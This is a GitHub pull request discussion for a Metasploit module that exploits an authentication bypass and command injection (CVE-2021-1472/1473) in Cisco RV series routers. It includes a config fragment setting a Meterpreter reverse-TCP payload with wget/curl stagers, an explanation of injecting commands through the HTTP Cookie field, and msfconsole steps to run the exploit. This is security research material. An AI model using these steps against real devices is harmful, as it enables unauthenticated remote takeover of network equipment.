Cisco RV Series Unauth RCE (CVE-2021-1472/CVE-2021-1473) #16128
```ruby
      },
      'CmdStagerFlavor' => [ 'wget', 'curl' ],
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
```
I've received review feedback a couple of times to not include this since it's the default value. However, when switching between targets (this module has two), if the default is not set then it needs to be manually entered. For example, if I start off with target 0 ('Unix Command') and switch to 'Linux Dropper' with no default set then the payload will be 'cmd/unix/reverse_netcat', which is obviously not a compatible payload.
This is correct. You can and should set a payload for each target.
Code looks good to me. Just left a suggestion regarding the module name in the verification steps in the docs.
documentation/modules/exploit/linux/http/cisco_rv_series_authbypass_and_rce.md
…ypass_and_rce.md Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Got it. Thanks!

Release Notes

This adds an exploit for various Cisco RV series VPNs / Routers for firmware versions
This module exploits an authentication bypass (CVE-2021-1472) and command injection (CVE-2021-1473) in the Cisco Small Business RV series of VPN/routers. The device does not adequately verify the credentials in the HTTP Authorization field when requests are made to the /upload endpoint. Then the upload.cgi binary will use the contents of the HTTP Cookie field as part of a `curl` request aimed at an internal endpoint. The curl request is executed using `popen` and allows the attacker to inject commands via the Cookie field. IoT Inspector has a nice write up describing the issues.

A remote and unauthenticated attacker using this module is able to achieve code execution as `www-data`. This module affects the RV340, RV340w, RV345, and RV345P using firmware versions 1.0.03.20 and below.

The one quirky thing about this module is that I experienced stability issues with the armle reverse stager (see #16107). I'm quite confident the module is not to blame (since I recreated without the module). However, since the Meterpreter payload doesn't land 100% of the time, I set the default to a standard unix reverse shell payload.
Verification

```
msfconsole
use exploit/linux/http/cisco_rv_series_authbypass_and_rce
set RHOST <ip>
check
set LHOST <ip>
exploit
```
PCAP || GTFO: cisco_rv_rce.zip

Video || GTFO: https://www.youtube.com/watch?v=fqre3sbViXI